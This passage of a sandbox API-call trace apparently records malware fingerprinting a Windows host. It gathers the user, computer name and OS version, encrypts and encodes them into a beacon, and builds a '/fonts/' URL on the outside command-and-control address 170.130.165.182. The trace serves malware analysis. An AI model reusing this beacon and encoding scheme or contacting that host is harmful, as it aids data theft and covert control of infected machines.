param_2="&uptime=%u" | out: param_1="&uptime=29091") returned 13 [0251.174] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0251.174] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0251.175] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0251.175] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0251.178] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0251.178] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0251.178] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0251.178] HeapFree (hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50) [0251.178] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0251.178] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0251.178] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0251.181] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0251.181] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0251.181] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0251.181] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0251.181] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0251.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHDzUwG/1Cd4dnsAO/K7aWTy6svkk", lpUsedDefaultChar=0x0) returned 20 [0251.181] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0251.182] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0251.182] lstrlenA (lpString="170.130.165.182") [0251.182] lstrlenA (lpString="170.130.165.182") returned 15 [0251.182] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x10) returned 0x2c5ea50 [0251.182] memcpy (in: _Dst=0x2c5ea50, _Src=0x2c59e9c, _Size=0xf | out: _Dst=0x2c5ea50) returned 0x2c5ea50 [0251.183] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0251.183] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2be00d8 [0251.183] GetTickCount () returned 0x1b8efc5 [0251.183] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x7) returned 0x2c59a68 [0251.183] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x9) returned 0x2c5ea68 [0251.183] lstrlenA (lpString="%s=%s&") returned 6 [0251.183] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15) returned 0x2c59a78 [0251.183] sprintf (in: _Dest=0x2c59a78, _Format="%s=%s&" | out: _Dest="fvvhhdym=tagyuu&") returned 16 [0251.183] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea68 | out: hHeap=0x2860000) returned 1 [0251.183] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0251.183] lstrlenA (lpString="fvvhhdym=tagyuu&") returned 16 [0251.183] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29091&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0251.183] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd6) returned 0x2c59b28 [0251.183] strcpy (_Dest=0x2c59b28, _Source="fvvhhdym=tagyuu&") [0251.183] strcpy (in: _Dest=0x2c59b28, _Source="fvvhhdym=tagyuu&" | out: _Dest="fvvhhdym=tagyuu&") returned="fvvhhdym=tagyuu&" [0251.183] lstrcatA (lpString1="fvvhhdym=tagyuu&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29091&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0251.183] lstrcatA (in: lpString1="fvvhhdym=tagyuu&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29091&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="fvvhhdym=tagyuu&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29091&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="fvvhhdym=tagyuu&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29091&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0251.183] lstrlenA (lpString="fvvhhdym=tagyuu&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29091&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 213 [0251.183] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0251.183] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0251.186] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0251.186] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0251.186] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d378) returned 1 [0251.186] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0251.186] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0251.186] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c08 [0251.186] memcpy (in: _Dst=0x2c59c08, _Src=0x2c59b28, _Size=0x10 | out: _Dst=0x2c59c08) returned 0x2c59c08 [0251.186] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.186] memcpy (in: _Dst=0x2c59c18, _Src=0x2c59b38, _Size=0x10 | out: _Dst=0x2c59c18) returned 0x2c59c18 [0251.186] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.186] memcpy (in: _Dst=0x2c59c28, _Src=0x2c59b48, _Size=0x10 | out: _Dst=0x2c59c28) returned 0x2c59c28 [0251.186] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.186] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0251.186] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.186] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x6 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0251.187] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x6, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0251.187] CryptDestroyKey (hKey=0x77d378) returned 1 [0251.187] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0251.187] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0251.187] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa38 [0251.188] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c08 | out: hHeap=0x2860000) returned 1 [0251.189] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0251.189] StrTrimA (psz="f0VSlh4ZY0Jd0FgWTdUdOzUh8l/5ZNlw3MzTlY17lDO7mrj/GXddeQjt1Xrj5Bf8MKPfL/r3r2T3BFijF742++Y7mSnGBkHpquLKiRHi1IIPW+f8QzfZXVxopjyFXqFx8leVl4ALa4YkwfBZPXM0g0oFJyXajBPiwAkisIdNSWuTJF31UzDZrSHqFG8ti1V148zvtcfZ5HqpTT3uP4RtWr/oZU/6+7fM8tUsXUVO76RHiFe2N7vu/RVTaHH+cRPm9uL9mO/WPwGjOS6kHEnwd3tRU0QlpMzjxeettI7CYSz=", pszTrimChars="\r\n=") [0251.189] StrTrimA (in: psz="f0VSlh4ZY0Jd0FgWTdUdOzUh8l/5ZNlw3MzTlY17lDO7mrj/GXddeQjt1Xrj5Bf8MKPfL/r3r2T3BFijF742++Y7mSnGBkHpquLKiRHi1IIPW+f8QzfZXVxopjyFXqFx8leVl4ALa4YkwfBZPXM0g0oFJyXajBPiwAkisIdNSWuTJF31UzDZrSHqFG8ti1V148zvtcfZ5HqpTT3uP4RtWr/oZU/6+7fM8tUsXUVO76RHiFe2N7vu/RVTaHH+cRPm9uL9mO/WPwGjOS6kHEnwd3tRU0QlpMzjxeettI7CYSz=", pszTrimChars="\r\n=" | out: psz="f0VSlh4ZY0Jd0FgWTdUdOzUh8l/5ZNlw3MzTlY17lDO7mrj/GXddeQjt1Xrj5Bf8MKPfL/r3r2T3BFijF742++Y7mSnGBkHpquLKiRHi1IIPW+f8QzfZXVxopjyFXqFx8leVl4ALa4YkwfBZPXM0g0oFJyXajBPiwAkisIdNSWuTJF31UzDZrSHqFG8ti1V148zvtcfZ5HqpTT3uP4RtWr/oZU/6+7fM8tUsXUVO76RHiFe2N7vu/RVTaHH+cRPm9uL9mO/WPwGjOS6kHEnwd3tRU0QlpMzjxeettI7CYSz") returned 1 [0251.189] lstrlenA (lpString="f0VSlh4ZY0Jd0FgWTdUdOzUh8l/5ZNlw3MzTlY17lDO7mrj/GXddeQjt1Xrj5Bf8MKPfL/r3r2T3BFijF742++Y7mSnGBkHpquLKiRHi1IIPW+f8QzfZXVxopjyFXqFx8leVl4ALa4YkwfBZPXM0g0oFJyXajBPiwAkisIdNSWuTJF31UzDZrSHqFG8ti1V148zvtcfZ5HqpTT3uP4RtWr/oZU/6+7fM8tUsXUVO76RHiFe2N7vu/RVTaHH+cRPm9uL9mO/WPwGjOS6kHEnwd3tRU0QlpMzjxeettI7CYSz") returned 299 [0251.189] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc00 [0251.190] _snprintf (in: _Dest=0x2c5fc1a, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fc31, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fc49, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fc5a, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fc5d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fc77, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fce2, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fce8, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fcec, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fd06, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fd0f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0251.190] _snprintf (in: _Dest=0x2c5fd1c, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0251.191] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0251.191] lstrlenA (lpString="f0VSlh4ZY0Jd0FgWTdUdOzUh8l_2F5ZNlw3MzTlY17lDO7mrj_2FGXddeQjt1Xrj5Bf8MKPfL_2Fr3r2T3BFijF742_2B_2BY7mSnGBkHpquLKiRHi1IIPW_2Bf8QzfZXVxopjyFXqFx8leVl4ALa4YkwfBZPXM0g0oFJyXajBPiwAkisIdNSWuTJF31UzDZrSHqFG8ti1V148zvtcfZ5HqpTT3uP4RtWr_2FoZU_2F6_2B7fM8tUsXUVO76RHiFe2N7vu_2FRVTaHH_2BcRPm9uL9mO_2FWPwGjOS6kHEnwd3tRU0QlpMzjxeettI7CYSz") returned 323 [0251.191] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16c) returned 0x2c5fa38 [0251.191] memcpy (in: _Dst=0x2c5fa38, _Src=0x2c5fc00, _Size=0x17 | out: _Dst=0x2c5fa38) returned 0x2c5fa38 [0251.191] memcpy (in: _Dst=0x2c5fa50, _Src=0x2c5fc17, _Size=0xa | out: _Dst=0x2c5fa50) returned 0x2c5fa50 [0251.191] memcpy (in: _Dst=0x2c5fa5b, _Src=0x2c5fc21, _Size=0x11 | out: _Dst=0x2c5fa5b) returned 0x2c5fa5b [0251.191] memcpy (in: _Dst=0x2c5fa6d, _Src=0x2c5fc32, _Size=0xc | out: _Dst=0x2c5fa6d) returned 0x2c5fa6d [0251.191] memcpy (in: _Dst=0x2c5fa7a, _Src=0x2c5fc3e, _Size=0xb | out: _Dst=0x2c5fa7a) returned 0x2c5fa7a [0251.191] memcpy (in: _Dst=0x2c5fa86, _Src=0x2c5fc49, _Size=0xe | out: _Dst=0x2c5fa86) returned 0x2c5fa86 [0251.191] memcpy (in: _Dst=0x2c5fa95, _Src=0x2c5fc57, _Size=0x15 | out: _Dst=0x2c5fa95) returned 0x2c5fa95 [0251.191] memcpy (in: _Dst=0x2c5faab, _Src=0x2c5fc6c, _Size=0x10 | out: _Dst=0x2c5faab) returned 0x2c5faab [0251.191] memcpy (in: _Dst=0x2c5fabc, _Src=0x2c5fc7c, _Size=0xf | out: _Dst=0x2c5fabc) returned 0x2c5fabc [0251.191] memcpy (in: _Dst=0x2c5facc, _Src=0x2c5fc8b, _Size=0x12 | out: _Dst=0x2c5facc) returned 0x2c5facc [0251.191] memcpy (in: _Dst=0x2c5fadf, _Src=0x2c5fc9d, _Size=0x9 | out: _Dst=0x2c5fadf) returned 0x2c5fadf [0251.191] memcpy (in: _Dst=0x2c5fae9, _Src=0x2c5fca6, _Size=0x14 | out: _Dst=0x2c5fae9) returned 0x2c5fae9 [0251.191] memcpy (in: _Dst=0x2c5fafe, _Src=0x2c5fcba, _Size=0x13 | out: _Dst=0x2c5fafe) returned 0x2c5fafe [0251.191] memcpy (in: _Dst=0x2c5fb12, _Src=0x2c5fccd, _Size=0x16 | out: _Dst=0x2c5fb12) returned 0x2c5fb12 [0251.191] memcpy (in: _Dst=0x2c5fb29, _Src=0x2c5fce3, _Size=0xd | out: _Dst=0x2c5fb29) returned 0x2c5fb29 [0251.191] memcpy (in: _Dst=0x2c5fb37, _Src=0x2c5fcf0, _Size=0x8 | out: _Dst=0x2c5fb37) returned 0x2c5fb37 [0251.191] memcpy (in: _Dst=0x2c5fb40, _Src=0x2c5fcf8, _Size=0x17 | out: _Dst=0x2c5fb40) returned 0x2c5fb40 [0251.191] memcpy (in: _Dst=0x2c5fb58, _Src=0x2c5fd0f, _Size=0xa | out: _Dst=0x2c5fb58) returned 0x2c5fb58 [0251.191] memcpy (in: _Dst=0x2c5fb63, _Src=0x2c5fd19, _Size=0x11 | out: _Dst=0x2c5fb63) returned 0x2c5fb63 [0251.191] memcpy (in: _Dst=0x2c5fb75, _Src=0x2c5fd2a, _Size=0xc | out: _Dst=0x2c5fb75) returned 0x2c5fb75 [0251.191] memcpy (in: _Dst=0x2c5fb82, _Src=0x2c5fd36, _Size=0xb | out: _Dst=0x2c5fb82) returned 0x2c5fb82 [0251.191] memcpy (in: _Dst=0x2c5fb8e, _Src=0x2c5fd41, _Size=0x3 | out: _Dst=0x2c5fb8e) returned 0x2c5fb8e [0251.192] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc00 | out: hHeap=0x2860000) returned 1 [0251.192] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a78 | out: hHeap=0x2860000) returned 1 [0251.192] StrTrimA (in: psz="f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz", pszTrimChars="\r\n" | out: psz="f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz") returned 0 [0251.192] lstrlenA (lpString="/fonts/") returned 7 [0251.192] lstrlenA (lpString="f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz") returned 344 [0251.192] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x160) returned 0x2c59b28 [0251.192] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0251.192] lstrcatA (in: lpString1="/fonts/", lpString2="f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz" | out: lpString1="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz") returned="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz" [0251.192] lstrcpyA (in: lpString1=0x2c5fa38, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0251.192] lstrcpyA (in: lpString1=0x2be00d8, lpString2="170.130.165.182" | out: lpString1="170.130.165.182") returned="170.130.165.182" [0251.192] lstrcatA (in: lpString1="170.130.165.182", lpString2="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz" | out: lpString1="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz") 